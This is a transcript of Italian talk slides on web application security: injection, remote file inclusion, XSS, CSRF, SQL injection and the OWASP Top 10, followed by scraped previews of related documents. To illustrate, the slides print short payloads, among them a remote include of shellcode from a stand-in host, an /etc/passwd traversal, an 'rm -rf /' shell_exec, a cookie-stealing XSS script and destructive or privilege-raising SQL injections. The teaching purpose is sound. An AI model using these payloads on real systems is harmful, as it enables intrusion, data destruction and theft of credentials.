Web Application (In)Security

Dimensione: px
Iniziare la visualizzazioe della pagina:

Download "Web Application (In)Security"

Transcript

1 Web Application (In)Security UNCENSORED LUG Trieste Alessandro jekil Tanasi

2 Introduzione.. Ciao Gianni, sai ci siamo fatti fare il sito nuovo, abbiamo speso solo 500 ϵ..no no, non esiste documentazione. Tanto è solo carta inutile!? Ma alla fine, ti dirò, la sicurezza non ci interessa al momento Ma certo che sono sicuro! Il sito è protetto da firewall e antivirus Anzi.. usiamo un ritrovato della sicurezza chiamato S..S.. SSL! Ci protegge lui, figo no? Affermazioni illustri di manager, aziende, enti non citati.

3 Un comune sito web Abbiamo provato, e abbiamo miseramente fallito. Questo ci insegna che non vale la pena di provare. Homer Simpson

4 Siti e applicazioni web Il web è un'insieme di servizi applicativi per la distribuzione di contenuti Negozi online, online banking, community, e-government Una web application prende un input dall'utente, esegue delle operazioni sull'input magari interagendo con componenti di terze parti, mostra in output un risultato in formato HTML Quasi sempre scritto from scratch Utilizzo di uno o più linguaggi di programmazione: PHP, Perl, Pyhton, ASP,.. Spesso le funzionalità sono l'unico obbiettivo, spesso il programmatore non ha nozioni di programmazione sicura

5 Architettura Architetture complesse Piattaforme multiple Molti protocolli Web Servers Application Server Database Server Presentation Layer Business Logic Media Store Content services Customer Identificatio n Access Controls Transaction Information Core Business Data

6 Un brutto giorno... Arriva il conto: Perdita di clienti Problemi legali Costi aggiuntivi Perdita di credibilità it d e r c M 40 ked c a h s d car rd party i h t t a Breach cessor o r p t n payme on Visa i l l i m 2 2 affects 14 million nd cards acards. r T writer Mas, t2e 8 PM ED senior 005: 3:1 /Money June 20 By Jean Britain warns of major e mail attack Hackers seen aiming at government, corporate networks The Associated Press Updated: 1:42 p.m. ET June 16, 2005 di, CNN ne Saha

7 Quali problemi? Sviluppo web fatto in maniera caotica Prima si devono soddisfare i requisiti dettati dall'utente/committente (features), poi se avanza tempo si mette in sicurezza Se una cosa funziona bene perchè modificarla? Falsi sensi di sicurezza (SSL, firewall) Mancanza di competenze degli sviluppatori, non comprensione dei problemi da parte del management, poca importanza data alla sicurezza. Indisponibilità a investire in cose che non danno un ritorno visibile.

8 Statistiche.. Source: 2006 CSI/FBI survey

9 Una nuova web era People that writes at the state of the art, make the world more secure. Sarah Gordon

10 Web 2.0

11 Web 2.0 Components Protocolli (SOAP, XML-RPC, REST over HTTP o HTTPS) Strutture dati (XML, JSON, JS objects) Metodi di comunicazione (asincrone, cross domain proxy) Condivisione di informazioni

12 Tecnologie 2.0 Architetture complesse Confusione creata dalle tante tecnologie usate RSS e molte sorgenti di dati non fidate Widgets e componenti di terze parti Condivisione delle informazioni Ma.. gli sviluppatori web sanno gestire tutto questo in modo sicuro?

13 Vulnerabilità comuni To win a war, one must know the way. Sun Tzu The Art of War

14 Utente, user input Gli utenti sono brave persone, di cui ci si può fidare, e che useranno l'applicazione nel modo corretto, tutti sono miei amici! L'applicazione non si aspetta input maliziosi, fiducia implicita nell'input E c'era la marmotta che incartava la cioccolata... L'input proveniente da un utente non è mai fidato L'obbiettivo è mettere l'applicazione in uno stato non previsto, per ottenere comportamenti anomali o informazioni di debugging

15 Globals Ad ogni parametro in input corrisponde una variabile, variabili globali Abilitate con il parametro register_globals (disabilitato di default da PHP 4.1.0) <?php fai_cose_con($pippo);?> Manipolazione di variabili (e conseguenze..)

16 Code injection Alcune funzioni (eval, exec, fopen, etc.) valutano codice o effettuano chiamate al sistema operativo <?php $name = $_GET['arg']; exec("echo $name");?> rm /etc/passwd Inietta codice (PHP script, comandi shell) Esecuzione di codice sul web server con i privilegi del web server

17 Remote file inclusion <?php include($layout);?> Esecuzione di codice remoto L'attaccante può far scaricare ed eseguire codice con i privilegi del web server semplicemente modificando l'url

18 Esempi Serendipity WordPress include(abspath. 'wp content/plugins/'. trim( $_GET['plugin'] )); 'include/db/db.inc.php'); include($_request['installdir']. '/Settings.php'); Squirellmail Plugin include($_post['include']);

19 Exploit Sensitive File retrieval Arbitrary code execution?value=http://www.hackme.com/shellcode.txt Content Removal?value=../../../../../../../../../etc/passwd shell_exec( nohup rm rf / 2>&1 1>/dev/null & ); Infinite possibilità d'uso...

20 Cross site scripting(xss) Fiducia implicita nel contenuto del browser Un sito fidato viene usato per distribuire contenuti malevoli Codice HTML e/o Javascript iniettato <?php echo You searched for $q ; // show results?>

21 XSS Privacy: Può trasmettere dati privati dell'utente, tracciamento, history Autenticazione: furto di credenziali, password manager Integrità: Può alterare il sito visitato, phishing Disponibilità: causare DoS Exploitation del browser e sue estensioni Rich Internet Applications (Flash, Acrobat, Java, ActiveX, Silverlight, Media Player) Scansione della intranet Attacchi alla intranet

22 Esempi phpmyadmin phpmyedit echo '<input type="hidden" name="fl" value="'.$_post[fl].'" />'."\n"; University of Toronto echo $_COOKIE['pma_db_filename_template']; <input type="hidden" name="show_courses" value="<?php echo $_GET['show_courses'];?>" /> Modernbill <form action="<?php echo $_SERVER['PHP_SELF'];?>" method="get">

23 Exploit Cookie/Session Theft Content Modification <script>document.getelementbyid( price ).inn erhtml= $1 ;</script> CSRF Initiation <script>window.location=...? document.cookie;</script> <img src= /> Social Engineering <iframe src= ></iframe>

24 CSRF Modello di autenticazione tradizionale: l'utente fa login e tutte le successive richieste sono autenticate Cross Site Request Forgery Forzare il browser a mandare richieste per un sito ad insaputa dell'utente (trasferimenti di denaro, post sul blog) <img src="http://google.com/search?q=porno"/> Utente forzato a fare una richiesta (autenticata) non voluta

25 SQL Injection Molti siti web usano un DBMS per gestire e memorizzare dati SQL è un linguaggio (DDL, DML, e altro..) <?php mysql_query( SELECT * FROM users WHERE uid='$var' );?> DELETE FROM users; Iniezione di query arbitrarie al DBMS, attacco al backend Amplificata da errate configurazioni dei DBMS

26 Esempi Bugs (bug tracking software) OSTicket "SELECT * FROM ticket_reps WHERE ID='$_POST[r_id]'" XOOPS "select * from userstable where uname='". $_COOKIE['FIDOlogin'][1]."'limit 1" "SELECT pass FROM {$table_prefix}users WHERE uname='$_cookie[$auth_ucookie]'" phpmyfaq "SELECT time FROM ".SQLPREFIX."faqsessions WHERE sid = ".$_REQUEST["id"]

27 Exploit Arbitrary Query Injection Arbitrary data retrieval?id=column_name Denial of Service?val=(DELETE FROM table);?val=(benchmark( , MD5(RAND())); Data Modification?val=(UPDATE users SET is_admin=1);

28 Autenticazione debole Gestione dell'autenticazione e della sessione Debolezze architetturali (Forgot my pass) Authentication bypass Session hijacking Brute forcing o previsione del session ID Cookie Overload / Session Fixation I cookie sono un'input utente e come tali vanno trattati

29 Errori di gestione Software installati e mai aggiornati Configurazioni errate, affrettate o di default Presenza di file non necessari, di backup, di esempio Permessi sbagliati, policy errate su dati privati Servizi non necessari abilitati, funziolità non utilizzate abilitate Account di default utilizzabili Debug abilitato

30 OWASP Top Cross Site Scripting (XSS) Injection Flaws Malicious File Execution Code vulnerable to remote file inclusion (RFI) Insecure Direct Object Reference Cross Site Request Forgery (CSRF) Information Leakage and Improper Error Handling Broken Authentication and Session Management Insecure Cryptographic Storage Insecure Communication Failure to Restrict URL Access

31 Ulteriori minacce We wouldn t need so much network security, if we didn t have such bad software security. Bruce Schneier

32 Web Services Standard per la comunicazione machine to machine (XML, SOAP, WSDL, UDDI) Interfaccia alla business logic e hai dati Automazione di processi di business (b2b, b2c), nuovi servizi Soffrono delle stesse problematiche delle applicazioni web: Messaggi di errori pettegoli SQL Injection Gestione delle eccezioni Access control Gestione delle sessioni Configurazioni errate

33 Malware Amministratori di siti che includono volutamente malware Siti defacciati che includono non volutamente malware Malware iniettato in aree pubbliche (XSS persistente) Click su link malformati in maniera apposita (XSS non persistente) Worm e virus dal mondo reale: Myspace.com 2005, Yamanner 2006

34 Altre vulnerabilità XML Security JJavascript manipulationson Security AJAX Security Buffer overflow Spam relay Timing Attacks ActiveX Controls Java applets (sandbox bypassing) Javascript manipulation Xpath Injection..e molto altro

35 Conclusioni Le applicazioni web sono quasi sempre scritte male o in fretta Quindi molto vulnerabili, principalmente a causa di problemi legati alla validazione dell'input o problemi architetturali Il codice delle web application fa parte del perimetro di sicurezza Le web application sono un bersaglio ghiotto La tecnologia cambia velocemente (JS, AJAX, WS), l'innovazione spesso non avviene in modo corretto

36 Slides Le slides di questa presentazione sono già disponibili su: Per informazioni: Non esitate a contattarmi anche solo per far due chiacchere...

37 Licenza Questo documento viene rilasciato sotto licenza Alcoolware, la quale non è altro che una normale licenza Creative Commons Attribute NonCommercial ShareALike [1] ma con l'aggiunta che se mi incontrate dobbiamo andare a bere qualcosa. In sintesi è liberamente distribuibile per usi non commerciali, copiabile e modificabile purchè citiate l'autore e la fonte. Se volete distribuire questo documento sul vostro sito siete pregati per favore di comunicarmelo in modo che possa spedirvi le nuove versioni. [1] nc sa/2.0/

38

Web Application (In)Security

Web Application (In)Security Web Application (In)Security Alessandro jekil Tanasi alessandro@tanasi.it http://www.tanasi.it LUG Trieste Introduzione.. Ciao Gianni, sai ci siamo fatti fare il sito nuovo, abbiamo speso solo 500 ϵ..no

Dettagli

Indice register_globals escaping

Indice register_globals escaping 1 Indice La sicurezza delle applicazioni web Le vulnerabilità delle applicazioni web La sicurezza in PHP: La direttiva register_globals Filtrare l'input Filtrare l'output (escaping) SQL Injection Cross

Dettagli

Agenda. IT Security Competence Center Web Application Security. Web Application Security. Tito Petronio 03/03/2011

Agenda. IT Security Competence Center Web Application Security. Web Application Security. Tito Petronio 03/03/2011 IT Security Competence Center Web Application Security Tito Petronio SANS GCFA, GWAS Certified Professional 18 Febbraio 2011 Agenda Web Application Security OWASP Vulnerabilità delle Applicazioni Web Sicurezza

Dettagli

Attacchi alle applicazioni web: SQL injection e Cross-site scripting (XSS)

Attacchi alle applicazioni web: SQL injection e Cross-site scripting (XSS) UNIVERSITÀ DEGLI STUDI DI CATANIA Facoltà di Ingegneria Corso di laurea Specialistica in Ingegneria Informatica Tesina di Sicurezza nei Sistemi informativi Simona Ullo Attacchi alle applicazioni web: SQL

Dettagli

Dott. Marcello Pistilli Business Development Manager. del software alla produzione:

Dott. Marcello Pistilli Business Development Manager. del software alla produzione: Direzione Tecnica /BU Sicurezza Dott. Marcello Pistilli Business Development Manager Ethical Hacking, dallo sviluppo del software alla produzione: Code review e Pen testing 07/05/2008 M300-5 FATTORE UMANO

Dettagli

KLEIS WEB APPLICATION FIREWALL

KLEIS WEB APPLICATION FIREWALL KLEIS WEB APPLICATION FIREWALL VERSIONE 2.1 Presentazione www.kwaf.it Cos'è Kleis Web Application Firewall? Kleis Web Application Firewall (KWAF) è un firewall software per la difesa di: Web Application

Dettagli

Attacchi alle Applicazioni Web

Attacchi alle Applicazioni Web Attacchi alle Applicazioni Web http://www.infosec.it info@infosec.it Relatore: Matteo Falsetti Webbit03 Attacchi alle Applicazioni Web- Pagina 1 Applicazioni web: definizioni, scenari, rischi ICT Security

Dettagli

Analisi di vulnerabilità e prevenzione di attacchi SQL injection e Cross-site Scripting

Analisi di vulnerabilità e prevenzione di attacchi SQL injection e Cross-site Scripting Pattern Recognition and Applications Lab Analisi di vulnerabilità e prevenzione di attacchi SQL injection e Cross-site Scripting Dott. Ing. Igino Corona igino.corona (at) diee.unica.it Corso Sicurezza

Dettagli

Le problematiche di Web Application Security: la visione di ABI Lab. The OWASP Foundation http://www.owasp.org. Matteo Lucchetti

Le problematiche di Web Application Security: la visione di ABI Lab. The OWASP Foundation http://www.owasp.org. Matteo Lucchetti Le problematiche di Web Application Security: la visione di ABI Lab Matteo Lucchetti Senior Research Analyst ABI Lab OWASP-Day II Università La Sapienza, Roma 31st, March 2008 Copyright 2008 - The OWASP

Dettagli

Legenda: Vengono riportate qui brevi descrizioni di alcuni dei più noti e comuni tipi di vulnerabilità,in base al loro grado di pericolosità.

Legenda: Vengono riportate qui brevi descrizioni di alcuni dei più noti e comuni tipi di vulnerabilità,in base al loro grado di pericolosità. Legenda: Vengono riportate qui brevi descrizioni di alcuni dei più noti e comuni tipi di vulnerabilità,in base al loro grado di pericolosità. Livello di Pericolosità 3: Login Cracking: Il cracking è il

Dettagli

LBSEC. http://www.liveboxcloud.com

LBSEC. http://www.liveboxcloud.com 2014 LBSEC http://www.liveboxcloud.com LiveBox Srl non rilascia dichiarazioni o garanzie in merito al contenuto o uso di questa documentazione e declina qualsiasi garanzia espressa o implicita di commerciabilità

Dettagli

Navigazione automatica e rilevazione di errori in applicazioni web

Navigazione automatica e rilevazione di errori in applicazioni web Politecnico di Milano Navigazione automatica e rilevazione di errori in applicazioni web Relatore: Prof. Stefano Zanero Fabio Quarti F e d e r i c o V i l l a A.A. 2006/2007 Sommario Obiettivo: Illustrare

Dettagli

Sicurezza delle applicazioni web: attacchi web

Sicurezza delle applicazioni web: attacchi web Università degli Studi di Milano Facoltà di Scienze Matematiche, Fisiche e Naturali Sicurezza delle applicazioni web: attacchi web Alessandro Reina Aristide Fattori

Dettagli

Sicurezza delle applicazioni web: attacchi web

Sicurezza delle applicazioni web: attacchi web Università degli Studi di Milano Facoltà di Scienze Matematiche, Fisiche e Naturali Anno Accademico 2010/2011 Sicurezza delle applicazioni web: attacchi web Alessandro Reina, Aristide Fattori 12 Maggio

Dettagli

Attacchi Web. Davide Marrone

Attacchi Web. Davide Marrone <davide@security.dico.unimi.it> Davide Marrone davide@security.dico.unimi.it Università degli Studi di Milano Facoltà di Scienze Matematiche, Fisiche e Naturali Dipartimento di Informatica e Comunicazione 22 gennaio 2007 Sommario Classificazione

Dettagli

Laboratorio di reti II: Problematiche di sicurezza delle reti

Laboratorio di reti II: Problematiche di sicurezza delle reti Laboratorio di reti II: Problematiche di sicurezza delle reti Stefano Brocchi brocchi@dsi.unifi.it 30 maggio, 2008 Stefano Brocchi Laboratorio di reti II: Sicurezza web 30 maggio, 2008 1 / 43 La sicurezza

Dettagli

Indice generale. Parte I Anatomia del Web...21. Introduzione...xiii

Indice generale. Parte I Anatomia del Web...21. Introduzione...xiii Indice generale Introduzione...xiii Capitolo 1 La sicurezza nel mondo delle applicazioni web...1 La sicurezza delle informazioni in sintesi... 1 Primi approcci con le soluzioni formali... 2 Introduzione

Dettagli

LBSEC. http://www.liveboxcloud.com

LBSEC. http://www.liveboxcloud.com 2014 LBSEC http://www.liveboxcloud.com LiveBox Srl non rilascia dichiarazioni o garanzie in merito al contenuto o uso di questa documentazione e declina qualsiasi garanzia espressa o implicita di commerciabilità

Dettagli

Internet Banking e Web Security

Internet Banking e Web Security Internet Banking e Web Security Giorgio Fedon Chief Operation Officer Minded Security S.r.l. OWASP-Day II Università La Sapienza, Roma 31st, March 2008 giorgio.fedon@mindedsecurity.com Copyright 2008 -

Dettagli

Sicurezza delle applicazioni web

Sicurezza delle applicazioni web Sicurezza delle applicazioni web (Programmazione sicura in ambiente web) Luca Carettoni l.carettoni@securenetwork.it 26 Novembre Linux Day 2005 2005 Secure Network S.r.l. Il peggiore dei mondi... Un server

Dettagli

Quale è lo stato della sicurezza? Problemi di sicurezza nello sviluppo di applicazioni web. Problemi di sicurezza nello sviluppo di applicazioni web

Quale è lo stato della sicurezza? Problemi di sicurezza nello sviluppo di applicazioni web. Problemi di sicurezza nello sviluppo di applicazioni web Problemi di sicurezza nello sviluppo di applicazioni web Antonio Lioy < lioy @ polito.it > Politecnico di Torino Dip. Automatica e Informatica Quale è lo stato della sicurezza? milioni di euro e milioni

Dettagli

Problemi di sicurezza nello sviluppo di applicazioni web. Quale è lo stato della sicurezza? Problemi di sicurezza nello sviluppo di applicazioni web

Problemi di sicurezza nello sviluppo di applicazioni web. Quale è lo stato della sicurezza? Problemi di sicurezza nello sviluppo di applicazioni web Problemi di sicurezza nello sviluppo di applicazioni web Antonio Lioy < lioy @ polito.it > Politecnico di Torino Dip. Automatica e Informatica Quale è lo stato della sicurezza? milioni di euro e milioni

Dettagli

Simone Riccetti. Applicazioni web:security by design

Simone Riccetti. Applicazioni web:security by design Simone Riccetti Applicazioni web:security by design Perchè il problema continua a crescere? Connettività: Internet L incremento del numero e delle tipologie d vettori di attacco è proporzionale all incremento

Dettagli

Problemi di sicurezza nello sviluppo di applicazioni web

Problemi di sicurezza nello sviluppo di applicazioni web Problemi di sicurezza nello sviluppo di applicazioni web Antonio Lioy < lioy @ polito.it > Politecnico di Torino Dip. Automatica e Informatica Quale è lo stato della sicurezza? milioni di euro e milioni

Dettagli

Elementi di Sicurezza e Privatezza Lezione 13 Web Security. Chiara Braghin

Elementi di Sicurezza e Privatezza Lezione 13 Web Security. Chiara Braghin Elementi di Sicurezza e Privatezza Lezione 13 Web Security Chiara Braghin Cookie e Sicurezza HTTP e i cookie (1) Vi ricordate? I Web server in genere sono stateless: una serie di richieste dallo stesso

Dettagli

Elementi di Sicurezza e Privatezza Lezione 13 Web Security. Chiara Braghin. Cookie e Sicurezza

Elementi di Sicurezza e Privatezza Lezione 13 Web Security. Chiara Braghin. Cookie e Sicurezza Elementi di Sicurezza e Privatezza Lezione 13 Web Security Chiara Braghin Cookie e Sicurezza 1 HTTP e i cookie (1) Vi ricordate? I Web server in genere sono stateless: una serie di richieste dallo stesso

Dettagli

- Oggi si sente sempre più spesso parlare di malware e virus. - Cosa sono? - Perché difendersi? - Cosa è lo spam?

- Oggi si sente sempre più spesso parlare di malware e virus. - Cosa sono? - Perché difendersi? - Cosa è lo spam? Perché questo corso - Oggi si sente sempre più spesso parlare di malware e virus. - Cosa sono? - Perché difendersi? - Cosa è lo spam? Cosa spiegheremo - protocolli e le tecnologie internet - quali sono

Dettagli

PHP Secure Programming

PHP Secure Programming PHP Secure Programming Seminario sviluppato nell'ambito del corso di Sicurezza, Dipartimento di Informatica e Scienze dell'informazione (DISI), Genova Autore: Matteo Greco

Dettagli

Concetti base. Impianti Informatici. Web application

Concetti base. Impianti Informatici. Web application Concetti base Web application La diffusione del World Wide Web 2 Supporto ai ricercatori Organizzazione documentazione Condivisione informazioni Scambio di informazioni di qualsiasi natura Chat Forum Intranet

Dettagli

$whois. Introduzione Attacco a una webapp Attacco a un sistema Conclusioni. http://voidsec.com voidsec@voidsec.com

$whois. Introduzione Attacco a una webapp Attacco a un sistema Conclusioni. http://voidsec.com voidsec@voidsec.com $whois Paolo Stagno Luca Poletti http://voidsec.com voidsec@voidsec.com Nell anno 2013: Aumento del 30% degli attacchi a siti e web application 14 zero-day 5,291 nuove vulnerabilità scoperte, 415 di queste

Dettagli

Esercitazione 8. Basi di dati e web

Esercitazione 8. Basi di dati e web Esercitazione 8 Basi di dati e web Rev. 1 Basi di dati - prof. Silvio Salza - a.a. 2014-2015 E8-1 Basi di dati e web Una modalità tipica di accesso alle basi di dati è tramite interfacce web Esiste una

Dettagli

Tecnologia avanzata e project engineering al servizio della PA Sicurezza delle reti della PA, dei servizi pubblici e delle attività digitali degli impiegati pubblici FORUM PA Digital Security per la PA

Dettagli

UNIVERSITÀ DI CATANIA Facoltà di Ingegneria Corso di laurea Specialistica in Ingegneria Informatica. Simona Ullo

UNIVERSITÀ DI CATANIA Facoltà di Ingegneria Corso di laurea Specialistica in Ingegneria Informatica. Simona Ullo UNIVERSITÀ DI CATANIA Facoltà di Ingegneria Corso di laurea Specialistica in Ingegneria Informatica Simona Ullo ATTACCHI ALLE APPLICAZIONI WEB: SQL INJECTION E CROSS SITE SCRIPTING (XSS) Tesina di Sicurezza

Dettagli

La Sicurezza della Piattaforma Macromedia Flash : le Soluzioni Aziendali di Macromedia

La Sicurezza della Piattaforma Macromedia Flash : le Soluzioni Aziendali di Macromedia WHITE PAPER La Sicurezza della Piattaforma Macromedia Flash : le Soluzioni Aziendali di Macromedia Adrian Ludwig Settembre 2005 Copyright 2005 Macromedia, Inc.Tutti i diritti riservati. Le informazioni

Dettagli

Vulnerabilità informatiche (semplici)..

Vulnerabilità informatiche (semplici).. Vulnerabilità informatiche (semplici).. in infrastrutture complesse....il contenuto di questo speech è di pura fantasia, ogni riferimento a infrastrutture reali o fatti realmente accaduti è puramente casuale

Dettagli

Servizi centralizzati v1.2 (20/12/05)

Servizi centralizzati v1.2 (20/12/05) Servizi centralizzati v1.2 (20/12/05) 1. Premessa Anche se il documento è strutturato come un ricettario, va tenuto presente che l argomento trattato, vista la sua variabilità, non è facilmente organizzabile

Dettagli

SQL Injection The dark side of webapplication *** Siamo davvero certi che chi gestisce i nostri dati sensibili lo faccia in modo sicuro?

SQL Injection The dark side of webapplication *** Siamo davvero certi che chi gestisce i nostri dati sensibili lo faccia in modo sicuro? SQL Injection The dark side of webapplication *** Siamo davvero certi che chi gestisce i nostri dati sensibili lo faccia in modo sicuro? Che cos'e' SQL? Acronimo di 'Structured Query Language E' un linguaggio

Dettagli

Sicurezza delle applicazioni web: attacchi web

Sicurezza delle applicazioni web: attacchi web Università degli Studi di Milano Facoltà di Scienze Matematiche, Fisiche e Naturali Anno Accademico 2012/2013 Sicurezza delle applicazioni web: attacchi web Srdjan Matic, Aristide Fattori 31 Maggio 2013

Dettagli

DIVISIONE DATA & NETWORK SECURITY

DIVISIONE DATA & NETWORK SECURITY DIVISIONE DATA & NETWORK SECURITY www.pp-sicurezzainformatica.it FEDERAZIONE ITALIANA ISTITUTI INVESTIGAZIONI - INFORMAZIONI - SICUREZZA ASSOCIATO: FEDERPOL Divisione Data & Network Security www.pp-sicurezzainformatica.it

Dettagli

OWASP Web Application Penetration Checklist. Versione 1.1

OWASP Web Application Penetration Checklist. Versione 1.1 Versione 1.1 14 Luglio 2004 Questo documento è rilasciato sotto la licenza GNU, e il copyright è proprietà della Fondazione OWASP. Siete pregati di leggere e comprendere le condizioni contenute in tale

Dettagli

Cookie (1) - Componenti

Cookie (1) - Componenti Elementi di Sicurezza e Privatezza Lezione 10 Web Security (2) Code Injection Chiara Braghin chiara.braghin@unimi.it! Cookie (1) - Componenti 4 componenti: 1) cookie nell header del messaggio HTTP response

Dettagli

Elementi di Sicurezza e Privatezza Lezione 10 Web Security (2) Code Injection

Elementi di Sicurezza e Privatezza Lezione 10 Web Security (2) Code Injection Elementi di Sicurezza e Privatezza Lezione 10 Web Security (2) Code Injection Chiara Braghin chiara.braghin@unimi.it! Cookie (1) - Componenti 4 componenti: 1) cookie nell header del messaggio HTTP response

Dettagli

Tecnologie per il Web. Il web: Architettura HTTP HTTP. SSL: Secure Socket Layer

Tecnologie per il Web. Il web: Architettura HTTP HTTP. SSL: Secure Socket Layer Tecnologie per il Web Il web: architettura e tecnologie principali Una analisi delle principali tecnologie per il web Tecnologie di base http, ssl, browser, server, firewall e proxy Tecnologie lato client

Dettagli

KLEIS A.I. SECURITY SUITE

KLEIS A.I. SECURITY SUITE KLEIS A.I. SECURITY SUITE Protezione dei servizi non web Kleis A.I. SecureMail, Kleis A.I. SecureEmulation, Kleis A.I. SecureXEmulation, Kleis A.I. SecureTransfer, Kleis A.I. SecureShare www.kwaf.it Protezione

Dettagli

Tutti i CMS sono vulnerabili

Tutti i CMS sono vulnerabili Ogni sito realizzato con i CMS open-source più diffusi (WordPress, Joomla!, Drupal, etc.) se non correttamente gestito, può presentare innumerevoli problemi di sicurezza. 23/01/13-1/45 I progetti open

Dettagli

Sicurezza: credenziali, protocolli sicuri, virus, backup

Sicurezza: credenziali, protocolli sicuri, virus, backup Sicurezza: credenziali, protocolli sicuri, virus, backup La sicurezza informatica Il tema della sicurezza informatica riguarda tutte le componenti del sistema informatico: l hardware, il software, i dati,

Dettagli

Navigazione Consapevole. Conoscere il lato oscuro di Internet

Navigazione Consapevole. Conoscere il lato oscuro di Internet Navigazione Consapevole Conoscere il lato oscuro di Internet Intro Browsing e ricerche Privacy e sicurezza (password sicure / chiavi elettroniche) Usare la posta elettronica Difendersi dalle minacce online

Dettagli

vulnerabilità del software

vulnerabilità del software vulnerabilità del software 1 quando il software non si comporta correttamente. input precondizioni elaborazione postcondizioni output un programma è corretto quando su qualsiasi input che soddisfa le precondizioni

Dettagli

MEGA Advisor Architecture Overview MEGA 2009 SP5

MEGA Advisor Architecture Overview MEGA 2009 SP5 Revisione: August 22, 2012 Creazione: March 31, 2010 Autore: Jérôme Horber Contenuto Riepilogo Il documento descrive i requisiti sistema e le architetture di implementazione possibili per MEGA Advisor.

Dettagli

AREA SERVIZI ICT. Servizi di hosting offerti dall'area Servizi ICT. Contestualizzazione tecnologica. hosting.polimi.it

AREA SERVIZI ICT. Servizi di hosting offerti dall'area Servizi ICT. Contestualizzazione tecnologica. hosting.polimi.it AREA SERVIZI ICT Servizi di hosting offerti dall'area Servizi ICT Contestualizzazione tecnologica hosting.polimi.it Indice 1. Contestualizzazione... 4 1.1. Content Management System... 4 1.1.1. Componente

Dettagli

Servizi di hosting offerti dall'area Servizi ICT Contestualizzazione tecnologica. Area Servizi ICT

Servizi di hosting offerti dall'area Servizi ICT Contestualizzazione tecnologica. Area Servizi ICT Area Servizi ICT Servizi hosting di Ateneo Contestualizzazione tecnologica Versione 1.1 http://hosting.polimi.it Servizi di hosting offerti dall'area Servizi ICT Contestualizzazione tecnologica Politecnico

Dettagli

Corso di Informatica Modulo T3 B1 Programmazione web

Corso di Informatica Modulo T3 B1 Programmazione web Corso di Informatica Modulo T3 B1 Programmazione web 1 Prerequisiti Architettura client/server Elementi del linguaggio HTML web server SQL server Concetti generali sulle basi di dati 2 1 Introduzione Lo

Dettagli

Security Scan e Penetration Testing

Security Scan e Penetration Testing Security Scan e Penetration Testing esperienze di una realtà specializzata http://www.infosec.it info@infosec.it Il Net Probing INFOSEC Relatore: Stefano Venturoli Infosecurity 2002 Security Scan e Penetration

Dettagli

TeamPortal. Servizi integrati con ambienti Gestionali

TeamPortal. Servizi integrati con ambienti Gestionali TeamPortal Servizi integrati con ambienti Gestionali 12/2013 Accesso da remoto Accesso da remoto Esempio 1 Sul Firewall devono essere aperte le porte 80 : http (o quella assegnata in fase di installazione/configurazione

Dettagli

Primi risultati della Risk Analysis tecnica e proposta di attività per la fase successiva di Vulnerability Assessment

Primi risultati della Risk Analysis tecnica e proposta di attività per la fase successiva di Vulnerability Assessment TSF S.p.A. 00155 Roma Via V. G. Galati 71 Tel. +39 06 43621 www.tsf.it Società soggetta all attività di Direzione e Coordinamento di AlmavivA S.p.A. Analisi di sicurezza della postazione PIC operativa

Dettagli

PTSv2 in breve: La scelta migliore per chi vuole diventare un Penetration Tester. Online, accesso flessibile e illimitato

PTSv2 in breve: La scelta migliore per chi vuole diventare un Penetration Tester. Online, accesso flessibile e illimitato La scelta migliore per chi vuole diventare un Penetration Tester PTSv2 in breve: Online, accesso flessibile e illimitato 900+ slide interattive e 3 ore di lezioni video Apprendimento interattivo e guidato

Dettagli

Banking Malware evolution in Italy: defense approach

Banking Malware evolution in Italy: defense approach Banking Malware evolution in Italy: defense approach (Giorgio Fedon OWASP-Italy Minded Security ) 17 Aprile 2012 Pag. 1 Presentazione Ricerca OWASP Italy Board Member OWASP Antimalware project leader Testing

Dettagli

La sicurezza secondo skymeeting (data pubblicazione 06/12/2011)

La sicurezza secondo skymeeting (data pubblicazione 06/12/2011) La sicurezza secondo skymeeting (data pubblicazione 06/12/2011) www.skymeeting.net La sicurezza nel sistema di videoconferenza Skymeeting skymeeting è un sistema di videoconferenza web-based che utilizza

Dettagli

18. TECNICHE DI ACCESSO AI DATABASE IN AMBIENTE INTERNET

18. TECNICHE DI ACCESSO AI DATABASE IN AMBIENTE INTERNET 18. TECNICHE DI ACCESSO AI DATABASE IN AMBIENTE INTERNET Ipotesi di partenza: concetti di base del networking Le ipotesi di partenza indispensabili per poter parlare di tecniche di accesso ai database

Dettagli

Concetti base di sicurezza applicativa web. Massimo Carnevali Responsabile Esercizio dei Sistemi Informativi Comune di Bologna

Concetti base di sicurezza applicativa web. Massimo Carnevali Responsabile Esercizio dei Sistemi Informativi Comune di Bologna Concetti base di sicurezza applicativa web Massimo Carnevali Responsabile Esercizio dei Sistemi Informativi Comune di Bologna Agenda Concetti base Esempio reale (SQL code injection) Come cambia lo scenario

Dettagli

Scritto mercoledì 1 agosto 2012 13:52 sul sito informaticamente.pointblog.it

Scritto mercoledì 1 agosto 2012 13:52 sul sito informaticamente.pointblog.it Vulnerabilità dei CMS Joomla, Wordpress, ecc. Articoli tratti dal sito html.it e informaticamente.pointblog.it -------------------------------------------------------------------------------------------------------------

Dettagli

Tecnologie e Programmazione Web

Tecnologie e Programmazione Web Presentazione 1 Tecnologie e Programmazione Web Html, JavaScript e PHP RgLUG Ragusa Linux Users Group SOftware LIbero RAgusa http://www.solira.org - Nunzio Brugaletta (ennebi) - Reti 2 Scopi di una rete

Dettagli

ATM. Compatibile con diversi Canali di Comunicazione. Call Center / Interactive Voice Response

ATM. Compatibile con diversi Canali di Comunicazione. Call Center / Interactive Voice Response Compatibile con diversi Canali di Comunicazione Call Center / Interactive Voice Response ATM PLUS + Certificato digitale Dispositivi Portatili Mutua Autenticazione per E-mail/documenti 46 ,classico richiamo

Dettagli

Flavio De Paoli depaoli@disco.unimib.it

Flavio De Paoli depaoli@disco.unimib.it Flavio De Paoli depaoli@disco.unimib.it 1 Il web come architettura di riferimento Architettura di una applicazione web Tecnologie lato server: Script (PHP, Pyton, Perl), Servlet/JSP, ASP Tecnologie lato

Dettagli

Aspetti applicativi e tecnologia

Aspetti applicativi e tecnologia Aspetti applicativi e tecnologia Premessa Architetture usate per i database Le prime applicazioni erano definite monolitiche, cioè un unico computer (mainframe) gestiva sia le applicazioni che i dati,

Dettagli

TeamPortal. Infrastruttura

TeamPortal. Infrastruttura TeamPortal Infrastruttura 05/2013 TeamPortal Infrastruttura Rubriche e Contatti Bacheca Procedure Gestionali Etc Framework TeamPortal Python SQL Wrapper Apache/SSL PostgreSQL Sistema Operativo TeamPortal

Dettagli

Security by design. Come la gestione di un progetto può minimizzare i rischi per il business. Alessio L.R. Pennasilico - apennasilico@clusit.

